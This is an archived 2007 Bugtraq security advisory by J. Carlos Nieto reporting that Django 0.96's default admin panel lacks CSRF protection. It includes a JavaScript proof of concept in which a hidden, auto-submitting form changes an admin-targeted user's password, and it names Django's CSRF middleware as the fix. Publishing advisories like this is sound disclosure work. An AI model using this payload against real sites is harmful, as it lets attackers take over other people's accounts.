Django 0.96 (stable) Admin Panel CSRF

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Django 0.96 (stable) Admin Panel CSRF
From: "J. Carlos Nieto" <xiam@xxxxxxx>
Date: Mon, 29 Oct 2007 17:29:36 -0600
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Thunderbird 2.0.0.6 (X11/20070728)


Author: J. Carlos Nieto.
Date: Oct 21, 2007

There exists a security hole in the default django's admin panel.

Background
==========
Django is a high-level Python Web framework that encourages rapid
development and clean, pragmatic design.
Django has an automatic admin panel that allows a person with admin
privileges to modify the database tables, it allows to change any user
password too.
See more at http://www.djangoproject.com

Summary
=======
django has, by default, no CSRF protection, this may allow an attacker
to change any user password by tricking a victim with admin privileges
into a special forged web page (even in a a totally different server)
that sends a request to change the password of the user with id = n. The
victim does not know that the form was sent. If the victim has admin
privileges the exploit will succeed, otherwise nothing will happen.

Severity
========
Mild. This problem exists only with the default installation and can be
easily solved using a middleware found in here:
http://www.djangoproject.com/documentation/csrf/.

Proof of concept
================
<script type="text/javascript">
window.onload = function() {
   var url = "http://127.0.0.1:8000/admin/auth/user/1/password/";;

   var pass = "funky";

   var param = {
       password1: pass,
       password2: pass
   };

   var form = document.createElement('form');
   form.action = url;
   form.method = 'post';
   form.target = 'hidden';
   form.style.display = 'none';

   for (var i in param) {
       try {
           // ie
           var input = document.createElement('<input name="'+i+'">');
       } catch(e) {
           // other browsers
           var input = document.createElement('input');
           input.name = i;
       }
       input.setAttribute('value',  param[i]);
       form.appendChild(input);
   }
   document.body.appendChild(form);

   form.submit();
}
</script>

<iframe name="hidden" style="display: none"></iframe>


Solution
========
Use the django's CSRF protection in all your applications. Take a look
at http://www.djangoproject.com/documentation/csrf/.


Disclosure Timeline
===================
2007.10.18 - Vulnerability found
2007.10.18 - Vulnerability reported to vendor
2007.10.18 - Vendor response
2007.10.21 - Advisory release

License
=======

Copyright 2007 J. Carlos Nieto

The contents of this document are licensed under the Creative Commons -
Attribution / Share Alike license.

Prev by Date: Re: Holes in the firewall of Mac OS X Leopard
Next by Date: Airkiosk/formlib application is XSS vuln
Previous by thread: Secunia Research: IPSwitch IMail Server IMail Client Buffer Overflow
Next by thread: Airkiosk/formlib application is XSS vuln
Index(es):
- Date
- Thread